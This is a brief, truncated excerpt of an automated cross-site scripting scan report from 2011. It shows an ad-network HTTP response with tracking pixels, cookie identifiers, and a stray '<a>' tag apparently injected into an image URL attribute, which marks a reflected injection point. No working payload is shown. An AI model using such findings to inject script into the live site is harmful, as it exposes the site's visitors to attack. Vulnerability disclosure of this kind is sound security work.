Content-Length: 462

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1311365777-4076437aee9c"><a>587f12fdd92%7cMUID%3d360f843730f542a7a6e2e0acb7badb9d%7cTOptOut%3d1%7cEANON%3dA%253d0224022A5O_v0CQzF-naqiaQt73_Qf0-QjKAV1tfjaMwwCPMYNGtztcYxy6VioBxU4ZdU0S0rmIMhKDxkcOtgAUHwPSR9%2526E%253dFFF%2526W%253d1%22);" wi
...[SNIP]...

Report generated by XSS.CX at Tue Nov 01 07:11:34 CDT 2011.